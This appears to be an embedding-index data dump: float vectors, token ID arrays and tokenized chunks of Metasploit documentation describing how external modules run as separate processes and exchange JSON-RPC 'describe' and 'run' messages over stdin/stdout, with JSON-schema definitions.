0.4428061842918396, 0.12890367209911346, 0.7206464409828186, 0.3744013011455536, 0.08519459515810013, -0.30421963334083557, -1.4075984954833984, 0.5992212295532227, -0.7166626453399658, 0.20004156231880188, 1.6155345439910889, -0.1738731563091278, 0.46495625376701355, -0.9275296926498413, 0.20067083835601807, -0.4028472304344177, -0.6839123964309692, -1.7949144840240479, 0.7625885605812073, -0.250273734331131, -0.00015825479931663722, 0.3603154420852661, -0.18109695613384247, 0.2680627107620239, -0.5924429893493652, 1.178598403930664, -0.5813683271408081, -0.010224335826933384, -0.1707887500524521, 1.1496806144714355, -0.34644776582717896, 0.0034893297124654055, 0.09653061628341675, 0.31143027544021606, -0.3164009153842926, 0.7053496837615967, -0.3889510929584503, 0.06775448471307755, -0.2431190311908722, 0.3992815911769867, -0.4335387349128723, 0.6025820374488831, 0.9907750487327576, -0.5483103394508362, 0.2572227418422699, 0.7394609451293945, -0.5767307877540588, 0.4543457627296448, -0.07843296229839325, 0.017145132645964622, -1.6471902132034302, -0.9181308746337891, -0.8188191652297974, 0.56467604637146, -1.1392771005630493, -0.3582017421722412, 0.04644544795155525, 0.22451743483543396, 0.3996831178665161, -0.03385462611913681, 0.5010977983474731, -0.7484788298606873, 0.09861887991428375, -0.30301332473754883, 0.40006110072135925, -0.46558496356010437, -0.35685303807258606, 0.005585932172834873, 0.01620580442249775, -0.21235638856887817, -0.788612961769104, -0.09665606915950775, 0.3502988815307617, -0.17169718444347382, -0.1456684023141861, 0.09867582470178604, -0.5996978878974915, -0.08363385498523712, -0.04140554741024971, -0.3454609513282776, -0.613775372505188, 0.508181631565094, 0.5104514956474304, -0.7139146327972412, 0.4394409954547882, -0.11630307137966156, 0.19120077788829803, 0.8907119035720825, 0.6301276683807373, -0.1587161421775818, 0.5030152201652527, 0.8688404560089111 ]
[ 101, 2795, 1997, 8417, 19184, 3015, 2175, 25023, 14184, 3015, 18750, 14184, 5963, 2000, 2327, 102 ]
metasploit
118.txt
0
[CLS] for an introduction to the reasons and goals for external modules, see our 2017 haxmas post on the subject. request floweach time metasploit wants an external module to do something ( ex. describe itself or run with a certain configuration ), it runs the module in a new process and talks to it over stdin / stdout. to get the metadata from a module ( which includes options ), the call sequence looks a bit like : + - - - - - - - - - - - - + | metasploit | | | describe yourself + - - - - - - - - - - - - - - - - - - - + | + - - - - - - - - - - - - - - - - - - - > | some _ module. py | | | | | | | | | | | some metadata | | | | < - - - - - - - - - - - - - - - - - - - + | | | | | | | + - - - - - - - - - - - - - - - - - - - + | | | | + - - - - - - - - - - - - + a module run might look like : + - - - - - - - - - - - - + | metasploit | do a thing with | | these options + - - - - - - - - - - - - - - - - - - - + | + - - - - - - - - - - - - - - - - - - - > | some _ module. py | | | | | | | | | | | a bit of status | | | | < - - - - - - - - - - - - - - - - - - - + | | | | | | | moar status | | | | < - - - - - - - - - - - - - - - - - - - + | | | | | | | i found a thing | | | | < - - - - - - - - - - - - - - - - - - - + | | | | | | | + - - - - - - - - - - - - - - - - - - - + | | + - - - - - - - - - - - - + when a module meant for a single host is run against a range of hosts, metasploit
[ 0.45543423295021057, -0.8171831965446472, -0.6854541301727295, 0.556954026222229, -0.21395647525787354, -0.08477669954299927, -0.09856032580137253, 0.4980710446834564, 0.14190953969955444, 0.45286744832992554, 0.1109810620546341, -0.149819016456604, 0.2935110926628113, -0.0804668664932251, -0.5014481544494629, -0.016385912895202637, 0.0820530578494072, -0.2616812586784363, -1.453100562095642, -0.2381613701581955, 0.14884798228740692, -0.0272871945053339, -0.5264984369277954, -0.593085765838623, -0.7162550091743469, 0.261607825756073, 0.1613318920135498, -0.14688216149806976, 0.7313531637191772, 0.3933921158313751, 0.5888059735298157, -0.21546977758407593, -0.33736419677734375, -0.5437436699867249, 0.2080986201763153, -0.2891380786895752, 0.6017529964447021, -0.27267083525657654, 0.5656406879425049, -0.8471616506576538, -0.05499790981411934, -0.3873734474182129, 0.20400676131248474, -0.5464743971824646, -0.42906445264816284, -0.15807266533374786, -0.32038354873657227, -0.26148325204849243, 0.3266080319881439, -0.13924215734004974, 0.6415514945983887, 0.4225788414478302, 0.20725874602794647, 0.3385153114795685, -0.23529398441314697, -0.2942788004875183, -0.23521624505519867, 0.48521456122398376, -0.562842607498169, -0.07707251608371735, -0.607464611530304, 0.42797744274139404, -0.16147655248641968, -0.9383630752563477, 0.2832491099834442, 0.5934748649597168, 0.11371737718582153, -0.23633170127868652, 0.07084603607654572, -0.3958708345890045, 0.09260041266679764, 0.5211799144744873, -0.5645796060562134, -0.4539610743522644, -0.4153212308883667, -0.3081808388233185, 0.59603351354599, -0.14546534419059753, -0.09128512442111969, 0.3599933385848999, 0.38244420289993286, 1.1005604267120361, -0.07789935171604156, -0.4704201817512512, -0.4262494146823883, -0.6013252139091492, 0.09177649766206741, 0.35961923003196716, -0.8360218405723572, -0.2351883500814438, 0.6303184032440186, 0.7978112101554871, -0.31993547081947327, 0.08291606605052948, 0.30207160115242004, 1.0857304334640503, -0.29196977615356445, -0.38228869438171387, 0.059408944100141525, -0.011536265723407269, 0.6326383948326111, 0.6121021509170532, 0.39698246121406555, 0.02270013466477394, -0.30231761932373047, 0.32240691781044006, 0.5506253838539124, 0.007778077386319637, -0.45156702399253845, -0.0866568386554718, 0.22556228935718536, 0.14298471808433533, 0.1263856291770935, -0.5939294695854187, 0.006490170024335384, 1.1033947467803955, 0.6489272117614746, -0.3633894920349121, -0.3453514575958252, 0.6324455142021179, 0.07458431273698807, -0.4804255962371826, -0.37885475158691406, -0.08518479764461517, 0.12938763201236725, -0.12802475690841675, 0.17586129903793335, 0.21795088052749634, -0.8112549185752869, -0.7457854747772217, -0.4657542407512665, -0.2504737079143524, 0.59330815076828, 0.2832190692424774, -0.1841585487127304, 0.23777484893798828, -0.27653101086616516, 0.3781343698501587, 0.02442268282175064, -0.9093548655509949, 0.36978352069854736, 0.1107952818274498, 0.25085511803627014, 1.1687482595443726, -0.18398858606815338, -0.4924074709415436, -0.2111569046974182, -0.21827395260334015, -0.3405674993991852, 0.37870681285858154, 0.12758249044418335, -0.5147246718406677, 0.3573533594608307, -0.0166427381336689, -0.018949972465634346, 0.0993623286485672, -1.0056809186935425, 0.0850384309887886, -0.11872623860836029, 0.4515758752822876, -0.003025767859071493, 1.2136861085891724, -0.5550032258033752, 0.6262431740760803, -0.1686214953660965, 0.4307675361633301, -0.1976451277732849, -0.4552958309650421, -0.37390759587287903, 0.147286057472229, 0.09420353919267654, 0.1454971730709076, 0.1919851452112198, 0.31321632862091064, 1.4297908544540405, 0.6437342166900635, 0.34935927391052246, -0.08577734231948853, 0.07559267431497574, 0.7975096106529236, -0.8836191296577454, 0.5289976596832275, -0.013051451183855534, 0.7968231439590454, 0.04253562539815903, 0.17746661603450775, -0.37212297320365906, -0.3768171966075897, 0.135978102684021, -0.6915479898452759, -0.13080503046512604, 0.7325000166893005, 0.028473226353526115, 0.8182018399238586, 0.5063930153846741, -0.3625406324863434, -0.4304139018058777, 0.07673469185829163, -0.21934109926223755, -1.1861344575881958, -0.7557283639907837, 0.6767207384109497, -0.47147336602211, 0.19740396738052368, -0.5234447717666626, -0.004563722759485245, 0.2844565510749817, 0.7434508800506592, 0.1741904616355896, 0.5053291320800781, 0.7609363794326782, -0.14385780692100525, -0.1897471398115158, -0.011378154158592224, -0.608720064163208, -0.5808699131011963, -1.0548347234725952, 0.3526609539985657, -0.052329014986753464, 0.1371557116508484, -0.19129252433776855, 0.0008318240870721638, 0.5256842970848083, -0.07056482136249542, -0.4837786555290222, -0.4442369341850281, 0.3890598714351654, 0.4111599028110504, -0.01254187896847725, 0.7719393372535706, -0.40894028544425964, 0.783381998538971, 0.6192306280136108, 1.2146023511886597, 0.4909888803958893, -0.5977823734283447, 0.3879062533378601, 1.0641160011291504, -0.5507205724716187, 0.0020847117993980646, 0.0298843365162611, 0.8868698477745056, 0.37739190459251404, 0.5619012117385864, 0.30284583568573, 0.48387229442596436, 0.3174692988395691, -0.050564996898174286, 0.10939301550388336, 0.7744444012641907, -0.4919334053993225, 1.1453313827514648, 0.676347017288208, -0.5213200449943542, -0.6880298256874084, -0.5152959227561951, 0.3158613443374634, 0.6684518456459045, -0.4988994002342224, -0.6515727043151855, 0.4524610638618469, 0.459979772567749, -0.4359859526157379, 0.16130714118480682, 0.06818336993455887, 0.2799264192581177, -0.075857013463974, 0.3531303405761719, 0.3896956741809845, -0.43594422936439514, -0.7360917925834656, -0.2270580530166626, -0.8193942308425903, -0.1236615851521492, -0.8419239521026611, -0.034392643719911575, -0.4816480875015259, -0.5690624117851257, 0.2372167855501175, -0.4369972348213196, -0.03531396761536598, -0.09177117794752121, 0.6125275492668152, 0.279519647359848, -0.28972890973091125, -0.7180759906768799, -0.6135520339012146, -0.004845886025577784, -0.6639015078544617, 0.8427101373672485, -0.6845043897628784, -0.18181131780147552, -0.7999754548072815, -0.2247953861951828, 0.30644986033439636, 0.22580014169216156, 0.48291274905204773, 0.10306770354509354, -0.24463295936584473, -0.14251483976840973, -0.3835751712322235, 0.25631457567214966, 0.9647224545478821, 0.013653825037181377, -0.002880110638216138, 0.12960760295391083, 0.011233179830014706, 0.004670122638344765, 0.7782981991767883, 0.8658502697944641, -0.7446373105049133, 0.5107412338256836, -0.5063962340354919, 0.2924053966999054, -0.6757254600524902, 0.2506544888019562, 0.3235597014427185, 0.1960451602935791, 0.21329884231090546, -0.33471962809562683, 0.000986862345598638, -0.38354629278182983, 0.3585629165172577, -0.24803830683231354, -0.2277265042066574, 0.43251723051071167, 0.4966473877429962, -0.6052709817886353, 0.8525381684303284, -0.45761838555336, -0.3568667769432068, -0.10902228206396103, 0.3298256993293762, 1.0691406726837158, 0.029152296483516693, 0.6926895380020142, -0.6191493272781372, -0.02433878183364868, 0.1670440286397934, -0.2729600965976715, -0.13834764063358307, -0.09224054217338562, 0.7265473008155823, -0.13899539411067963, -0.48045700788497925, 0.5540688037872314, 0.7203859090805054, -0.7046335339546204, -0.20940135419368744, -0.5872995257377625, -0.3642537295818329, 0.31430917978286743, 0.633809506893158, 0.1939067840576172, 0.235353022813797, 0.6505117416381836, -0.11271559447050095, -0.12553511559963226, -0.2704245448112488, 0.16298307478427887, -0.022281043231487274, 0.5851020216941833, 0.08511536568403244, -0.10233307629823685, -0.7098703384399414, -0.35376015305519104, 0.4079786539077759, 0.20498773455619812, 0.7332958579063416, -0.016858000308275223, 0.8452521562576294, -0.054912593215703964, -0.2844429612159729, 0.07870881259441376, -0.11611989140510559, -0.6084027290344238, 0.307816743850708, 0.07590972632169724, 0.6930117607116699, -0.31560826301574707, 0.3967495262622833, -0.12301841378211975, -0.5267175436019897, -0.15748430788516998, 0.06046842783689499, 0.339669793844223, -0.2562880218029022, -0.5087120532989502, -0.34634000062942505, -0.4430047571659088, -0.04202445596456528, -0.08677024394273758, 0.6073506474494934, -0.3005887567996979, -0.7610899806022644, -0.6425716280937195, 0.3277718722820282, 1.232265591621399, 0.21237751841545105, 0.37259483337402344, 0.43622279167175293, 0.2080632895231247, -0.632797360420227, 0.43814003467559814, 0.277744859457016, 0.7927272319793701, -0.03890511021018028, 0.8046152591705322, -0.21940039098262787, 0.07939600199460983, -0.5904697775840759, 0.4478977918624878, -0.6124079823493958, 0.04180638864636421, 0.37398141622543335, -0.035895299166440964, -0.9049873352050781, -0.23355530202388763, 0.5112274885177612, -0.05160532519221306, -0.21264170110225677, -0.6881839632987976, -0.16802053153514862, 0.3033427894115448, 0.4892237186431885, -0.33632296323776245, -0.355125367641449, -0.5469958782196045, -0.33966511487960815, -0.02889767661690712, -0.018938982859253883, -0.34669041633605957, -0.6734586954116821, 0.06486830115318298, -1.114121675491333, 0.13128253817558289, 0.1674834042787552, 0.43488508462905884, -0.26792874932289124, -0.8116493821144104, 0.11988694965839386, 0.11825951188802719, -0.2311384081840515, -0.5927266478538513, -0.5763460993766785, 0.48072272539138794, 0.460097998380661, 0.5781930685043335, -0.09350276738405228, -0.2971116304397583, 0.31872934103012085, -0.39475953578948975, 0.7714885473251343, -1.061232328414917, 0.641075611114502, 0.5207747220993042, -0.5627401471138, -0.1866014301776886, 0.16597959399223328, -0.06409360468387604, 0.02060963399708271, -0.24774710834026337, 0.32566434144973755, -0.7681361436843872, -0.18743713200092316, 0.7296369075775146, 0.15488944947719574, -0.03800026699900627, 0.8079838156700134, 0.25673720240592957, -0.5102968811988831, 0.7206155061721802, 0.2477497011423111, -0.41122564673423767, -0.15018656849861145, -0.7369546294212341, 0.30850329995155334, 0.2859824299812317, -0.09683727473020554, -0.054212719202041626, -0.23549391329288483, 0.6917914748191833, 0.43271952867507935, 0.5085764527320862, -0.8468453884124756, -0.7010316848754883, -0.21596699953079224, 0.6163597106933594, 0.11251135915517807, 0.7991971373558044, -0.38666439056396484, -0.3337833285331726, 0.0940924733877182, -0.34390273690223694, -0.49744346737861633, -1.20890474319458, 0.7614755034446716, -0.5381593704223633, 0.2028058022260666, 0.010413700714707375, 0.08405275642871857, 0.32720109820365906, -0.2894945740699768, 0.7346853613853455, -1.1230664253234863, -0.14746958017349243, -0.1654852032661438, -0.3043459355831146, -0.35104241967201233, -0.06290112435817719, -0.5091163516044617, 0.041343580931425095, -0.365710973739624, -0.011793418787419796, -0.07345820963382721, -0.12111220508813858, 0.42581242322921753, -0.5025495290756226, -0.29379522800445557, 1.0494554042816162, 0.5790099501609802, -0.990805983543396, -0.10865841060876846, 0.435782790184021, 0.1467815488576889, 0.06588192284107208, -0.045561838895082474, -0.40245428681373596, -0.7564317584037781, -0.7710992693901062, -0.34232452511787415, 0.3957245647907257, -0.021603429690003395, -0.7468472719192505, -0.40501704812049866, -0.731359601020813, 0.42930006980895996, 0.33470168709754944, -1.287099003791809, -0.2810054123401642, -0.02805330790579319, 1.1512351036071777, -0.4044071435928345, 0.14654496312141418, -0.6411693096160889, -0.7364228963851929, -0.19706857204437256, 0.5707581043243408, 0.4525931775569916, 0.09150157123804092, -0.3567832410335541, -0.16761471331119537, -0.12737391889095306, 0.8113860487937927, -0.08298269659280777, -0.3623684048652649, -0.28253158926963806, -0.14663399755954742, 0.16037680208683014, 0.7745380401611328, -0.28119686245918274, 0.26587486267089844, -0.46606218814849854, 0.5590227246284485, -0.4298897981643677, -0.260705828666687, -0.44275733828544617, 0.1926843523979187, 1.1661365032196045, 0.1514085978269577, -0.6827788352966309, 0.24291016161441803, 0.5715042352676392, 0.7630155682563782, -0.15951628983020782, -0.40129998326301575, 0.6966711282730103, -0.44011425971984863, -1.172662377357483, 0.43741318583488464, -0.5364693999290466, -0.7586407661437988, -0.1945829689502716, 0.20807695388793945, 0.8600388169288635, -0.26379379630088806, 0.2713982164859772, 0.8077535033226013, 0.6268696784973145, -0.1492350995540619, -0.5228116512298584, 0.3575890064239502, 0.17325305938720703, 0.42085710167884827, 0.3629836142063141, -0.30932044982910156, 0.30919745564460754, -0.3860015869140625, 0.20381952822208405, -0.45994332432746887, -0.7500250339508057, -0.3751763701438904, 0.5444211363792419, -0.9265183210372925, -0.2518334984779358, -0.21950207650661469, -0.9773921966552734, -0.42987722158432007, -0.27019575238227844, -0.18078593909740448, 0.22439639270305634, 0.8135982155799866, 0.6532644629478455, 0.08463673293590546, -0.9413142800331116, 0.7248335480690002, -0.5200613141059875, -0.37671220302581787, 0.7050284147262573, 0.04490002617239952, -0.7153460383415222, 0.6764916777610779, 0.5919193029403687, -0.39077678322792053, -0.875100314617157, -0.8375122547149658, -0.24354715645313263, -0.1989896446466446, -0.5792108774185181, -0.6296080350875854, 0.34866368770599365, 0.10251214355230331, 0.2179240882396698, 0.9558417201042175, -0.3168444037437439, 0.07999584078788757, -0.3015907108783722, 0.32296478748321533, -0.3338478207588196, 0.3214683532714844, 0.47139909863471985, -0.19906975328922272, -0.5072610974311829, -0.6003854274749756, -0.22762764990329742, 0.05443831905722618, 0.12679515779018402, 1.1035138368606567, 0.019970739260315895, 0.5906494855880737, -0.22579844295978546, 0.5052040219306946, 0.6202095746994019, -0.4366675615310669, 0.40748709440231323, 0.9131431579589844, -0.41079631447792053, -0.5641965270042419, -0.03094237484037876, -0.00533918384462595, 0.31132036447525024, 0.1738404780626297, -0.055311545729637146, -0.45954298973083496, -0.1355331838130951, 0.1862083524465561, -0.018347209319472313, -0.8489749431610107, -0.6409265995025635, -0.7935896515846252, -0.018839841708540916, 0.15604789555072784, 0.047899678349494934, -0.22539213299751282, -0.7462099194526672, -0.7467756271362305, -0.658798098564148, -0.6940041184425354, -0.3724270761013031, 0.03226520121097565, -0.37547558546066284, -0.7141864895820618, -0.29887792468070984, -0.680822491645813, -0.5099786520004272, -0.056569911539554596, -0.23039314150810242, -0.43966904282569885, -0.40125104784965515, -0.6404803395271301, -0.1571875512599945, -0.6673438549041748, 0.6469371914863586, -1.194482684135437, 0.09931623190641403, -0.4380779266357422, -0.8097420930862427, -0.022650480270385742, 0.8716691136360168, -0.8565141558647156, 0.34093594551086426, -0.26941654086112976, 0.294905424118042, 0.5688460469245911, -0.42876067757606506, -0.10498480498790741, 0.5716778635978699, 0.1550334095954895, 0.28178852796554565, -0.41656965017318726, -0.8744273781776428, 0.018550682812929153, 0.30308690667152405, -0.6445245742797852, -0.31324633955955505, -1.058037519454956, 0.08422873914241791, 1.1397017240524292, 0.5060400366783142, 0.49181973934173584, 1.382548451423645, 0.7683646082878113, -0.23778478801250458, 0.08369910717010498, 0.865513026714325, 0.7457741498947144, -0.171963170170784, -0.0033164031337946653, 0.5774698257446289, -0.24323885142803192, -0.19625495374202728, 0.17871586978435516, 0.7235803604125977, -0.7527686953544617, -0.046092838048934937, 0.04370421543717384, 0.6157588362693787, -0.3064700961112976, -0.27498626708984375, 0.21617837250232697, 0.4176834225654602, 1.1058768033981323, 0.13318979740142822, 0.0843796655535698, -0.0488642156124115, -0.2052425593137741, -0.27861887216567993, -1.0553057193756104, 0.030376331880688667, 0.12227857857942581, -0.4367101788520813, -0.4655874967575073, -0.3684442341327667, -0.40574583411216736, -0.10600351542234421, -0.16897431015968323, 0.33055418729782104, 0.3300023674964905, -0.36377567052841187, 0.060759287327528, 0.5735924243927002, -0.9941461086273193, -0.6398422122001648, -0.3672323524951935, 0.47056785225868225, -0.7728182673454285, -0.6518335342407227, 0.3163289725780487, 1.0833326578140259, 0.367182195186615, 0.1956513524055481, -0.42994368076324463, 0.5803176164627075, 0.3439398407936096, 0.5327959060668945, -0.7453745007514954, 0.3183348774909973, -0.5814886093139648, 0.9137679934501648, -0.5201708674430847, -0.15739530324935913, -0.45558232069015503, -0.28575122356414795, -0.0670778751373291, -0.2545416057109833, -0.3351687490940094, 0.30470529198646545, -0.286834180355072, 0.085094153881073, 0.5706864595413208, 0.6989725232124329, 0.36495062708854675, -0.7207953333854675, 0.1563897281885147, -0.07933566719293594, 0.26377880573272705, 0.31686922907829285, 0.32527998089790344, 0.260997474193573, 0.34088531136512756, 0.6243085861206055, -0.5834078788757324, -0.5335031747817993, 0.276467502117157, 0.07761427760124207, -0.05544181168079376, -0.1441660076379776, -0.054413169622421265, 0.10345778614282608, -0.2212250530719757, -0.3448275923728943, 0.6274449229240417, 0.1047021746635437, -0.19745692610740662, -0.12358657270669937, -0.2846188247203827, 0.3411129117012024, -0.1555023491382599, -0.15124841034412384, -0.27960750460624695, -0.49833035469055176, 1.04729425907135, 0.6282283663749695, -0.41613849997520447, 0.5917208194732666, 1.4611823558807373, 0.359424889087677, -0.34853625297546387, 0.4635036587715149, -0.18929974734783173, 0.39635351300239563, 0.07071767002344131, 0.03689814358949661, -0.2798355519771576, 0.300647109746933, 0.0946260467171669, -0.7326326966285706, -0.6169813871383667, -0.2090488225221634, -0.039741262793540955, -0.41573697328567505, -0.24256740510463715, 0.14344878494739532, 0.42785951495170593, -0.9042671918869019, 0.33474743366241455, -0.8706216812133789, 0.43933719396591187, 0.12804488837718964, -0.4091698229312897, -0.714579701423645, 0.5328035950660706, 0.34009885787963867, 1.0447185039520264, 0.3853064477443695, 1.2643975019454956, -0.053494878113269806, 0.021116485819220543, 0.4759281277656555, -0.3798668384552002, -0.3954383432865143, 0.3229263126850128, 0.05940095707774162, 0.15328355133533478, 0.7045297622680664, -0.3386470377445221, 0.435424268245697, -0.32908502221107483, -0.41343775391578674, -0.3675325810909271, 0.08376050740480423, -0.3799378275871277, -0.9179723262786865, 0.6024230718612671, -0.061269406229257584, -0.6130390167236328, -0.4129020869731903, 0.37254655361175537, 0.2974666655063629, 0.2583393156528473, 0.05294373631477356, -0.5259473323822021, -0.9988111853599548, -0.0022633718326687813, 0.5395941138267517, 0.36116930842399597, -0.35322439670562744, -0.20608611404895782, -0.03083152323961258, -0.9219074249267578, -0.37967154383659363, -0.053466808050870895, -0.34851837158203125, -0.8072834014892578, 1.141797423362732, 0.3095628321170807, 1.1202287673950195, -0.09754819422960281, -0.27421292662620544, -0.40715599060058594, 0.32565227150917053, 0.8512030839920044, 0.1654062122106552, 1.1398584842681885, 0.1678648442029953, 0.06086578220129013, -0.08467879891395569, -0.23938511312007904, 0.8001677989959717, -0.5058547854423523, -0.2639455497264862, -0.0008740012999624014, -0.23375272750854492, -1.069943904876709, -0.24605189263820648, 0.14256447553634644, 0.41050824522972107, 0.5471125245094299, 0.14877364039421082, -0.8596923351287842, -0.5149188041687012, -0.909198522567749, -0.4765576720237732, -0.4065914452075958, 0.023068705573678017, 0.09053409844636917, -0.16169337928295135, 0.03692758083343506, -1.3619067668914795, 4.306674957275391, 0.9109587073326111, 0.1099996417760849, 0.4986896812915802, 0.34573063254356384, 0.4300309121608734, 0.8469696640968323, -0.7622138857841492, 0.17152777314186096, -0.5772137641906738, 0.4441421627998352, -0.3840080499649048, 0.10059544444084167, 0.32469362020492554, 0.7418017983436584, 1.2808940410614014, -0.5806052088737488, 0.23002564907073975, 0.05907474085688591, -0.5840569734573364, -0.8171619176864624, -0.034044668078422546, -0.2895612120628357, 0.709861695766449, 0.31834539771080017, 0.4045475423336029, -0.13577036559581757, -0.3967449963092804, 0.21949104964733124, -0.355374276638031, 0.2041657716035843, -0.05787622183561325, 0.249760702252388, -0.051906049251556396, -0.2769240140914917, 0.42424774169921875, -0.5184531211853027, -0.7512052059173584, -0.17040441930294037, 0.3203672766685486, 1.1599705219268799, -0.002105795545503497, 0.269107460975647, -0.2501569092273712, 0.07909698039293289, 0.2992675304412842, -0.5474690794944763, 0.06165868043899536, 0.4930051267147064, -0.5874110460281372, 0.5015778541564941, 0.3707928955554962, 0.25230783224105835, 0.2298687994480133, -0.9593349695205688, 0.14248856902122498, 0.18209069967269897, -0.5894975066184998, -0.10869130492210388, 0.1587921530008316, 0.3343728184700012, -0.7655865550041199, -0.0010646480368450284, 0.1102660670876503, -0.48361068964004517, 0.4092523157596588, -0.884337306022644, 0.7320046424865723, -0.07033396512269974, 0.35394054651260376, -0.2993076741695404, 0.6376762390136719, 0.0966961532831192, -0.18729743361473083, 0.14275670051574707, 0.11322853714227676, -0.14074207842350006, 0.07603461295366287, 0.9405637383460999, -0.2536691427230835, -0.41587042808532715, -0.3542499840259552, -1.083364486694336, 0.27966493368148804, 0.9122945666313171, 0.36986520886421204, -0.21410930156707764, -0.3497489392757416, 0.18593139946460724, 0.27802494168281555, 0.6237556338310242, 0.3293660283088684, -0.7989550828933716, -0.17538070678710938, 0.23956334590911865 ]
[ 101, 2005, 2019, 4955, 2000, 1996, 4436, 1998, 3289, 2005, 6327, 14184, 1010, 2156, 2256, 2418, 5292, 2595, 9335, 2695, 2006, 1996, 3395, 1012, 5227, 4834, 5243, 2818, 2051, 18804, 13102, 4135, 4183, 4122, 2019, 6327, 11336, 2000, 2079, 2242, 1006, 4654, 1012, 6235, 2993, 2030, 2448, 2007, 1037, 3056, 9563, 1007, 1010, 2009, 3216, 1996, 11336, 1999, 1037, 2047, 2832, 1998, 7566, 2000, 2009, 2058, 2358, 8718, 1013, 2358, 26797, 2102, 1012, 2000, 2131, 1996, 27425, 2013, 1037, 11336, 1006, 2029, 2950, 7047, 1007, 1010, 1996, 2655, 5537, 3504, 1037, 2978, 2066, 1024, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 18804, 13102, 4135, 4183, 1064, 1064, 1064, 6235, 4426, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1028, 1064, 2070, 1035, 11336, 1012, 1052, 2100, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 2070, 27425, 1064, 1064, 1064, 1064, 1026, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1064, 1064, 1064, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1037, 11336, 2448, 2453, 2298, 2066, 1024, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 18804, 13102, 4135, 4183, 1064, 2079, 1037, 2518, 2007, 1064, 1064, 2122, 7047, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1028, 1064, 2070, 1035, 11336, 1012, 1052, 2100, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1037, 2978, 1997, 3570, 1064, 1064, 1064, 1064, 1026, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 9587, 2906, 3570, 1064, 1064, 1064, 1064, 1026, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1045, 2179, 1037, 2518, 1064, 1064, 1064, 1064, 1026, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1064, 1064, 1064, 1064, 1064, 1064, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 1064, 1064, 1009, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1009, 2043, 1037, 11336, 3214, 2005, 1037, 2309, 3677, 2003, 2448, 2114, 1037, 2846, 1997, 6184, 1010, 18804, 13102, 4135, 4183 ]
metasploit
119.txt
0
will start a new process for each host. if the threads datastore option is set and it is an auxiliary module, that many processes will be run at the same time. json - rpc apiexternal modules communicate with metasploit over stdin / stdout. the methods a module must implement are describe and run ; additional methods can be advertised in the capabilities array, for now assumed to use a subset of the options used for run. metasploit implements message and will implement report in the near future. the specs for each method are written below using json - schema. work still needs to be done enumerating valid types and codes for the messages. describerequest { " $ schema " : " http : / / json - schema. org / schema # ", " type " : " object ", " required " : [ " params ", " method ", " jsonrpc ", " id " ], " properties " : { " jsonrpc " : { " enum " : [ " 2. 0 " ] }, " id " : { " type " : " string " }, " method " : { " enum " : [ " describe " ] }, " params " : { " type " : " object " } } } response { " $ schema " : " http : / / json - schema. org / schema # ", " type " : " object ", " required " : [ " jsonrpc ", " result ", " id " ], " properties " : { " jsonrpc " : { " enum " : [ " 2. 0 " ] }, " id " : { " type " : " string " }, " result " : { " type " : " object ", " required " : [ " name ", " description ", " authors ", " type ", " options ", " capabilities " ], " properties " : { " name " : { " type " : " string " }, " description " : { " type " : " string " }, " authors " : { " type " : " array ", " items " : { " type " : " string " } }, " date " : { " type " : " string " }, " references " : { " type " : " array ", " items " : { "
[ 0.480649471282959, -0.8684765696525574, -0.863349437713623, 0.34250369668006897, -0.5870329141616821, 0.020410362631082535, -0.34840714931488037, -0.2128196507692337, 0.22638042271137238, 0.8247471451759338, 0.4037974178791046, -0.4103347659111023, 0.6156469583511353, -0.42429330945014954, -0.3785126805305481, -0.23711882531642914, -0.4588472545146942, -0.45203667879104614, -1.096537470817566, -0.04549138993024826, 0.10735193639993668, 0.2641599774360657, -1.1641877889633179, -0.055579766631126404, -1.081233024597168, 0.4820800721645355, 0.4772384464740753, -0.0014716631267219782, 0.680432140827179, 0.47330766916275024, 0.03561428561806679, -0.4705674648284912, 0.33510762453079224, -0.6265740394592285, -0.17326530814170837, -0.5948224663734436, 1.0355316400527954, -0.23230032622814178, -0.17363287508487701, -0.7286582589149475, 0.6769124269485474, -0.38433560729026794, 0.22311903536319733, -0.6587310433387756, -0.5507551431655884, -0.46836742758750916, 0.2819797396659851, -0.1349325329065323, -0.011092512868344784, -0.47084754705429077, 0.5535464882850647, 0.3848491609096527, 0.322396457195282, 0.15442541241645813, 0.3284014165401459, -0.3949909806251526, -0.505549430847168, 0.4292145371437073, -0.4225277602672577, 0.48602283000946045, -0.4130121171474457, 0.5750044584274292, 